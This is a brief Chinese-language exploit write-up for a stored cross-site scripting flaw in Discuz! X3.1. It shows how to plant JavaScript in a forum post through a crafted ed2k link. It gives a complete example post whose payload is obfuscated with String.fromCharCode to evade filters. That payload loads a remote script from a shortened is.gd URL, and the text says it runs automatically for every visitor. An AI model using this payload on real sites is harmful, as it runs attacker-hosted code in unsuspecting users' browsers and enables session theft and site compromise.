XSS · Discuz! X3.1 储存型 ed2k

ed2k://|file|test|'+这里放要执行的javascript代码+'|test/

其中的test也可以换成其他自己喜欢的文字。
如发帖内容:

好可爱,可惜了
ed2k://|file|lovely|'+document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,115,46,103,100,47,53,65,110,75,76,88,62,60,47,115,99,114,105,112,116,62))+'|test/


然后等待用户访问并在访问的时候自动执行以下代码:

document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,115,46,103,100,47,53,65,110,75,76,88,62,60,47,115,99,114,105,112,116,62));

先将字符串转换为逐个的ASCII码,之后在用String.fromCharCode转回字符串,以躲避一些过滤。
事实上就是:

document.write(<script src=http://is.gd/5AnKLX></script>);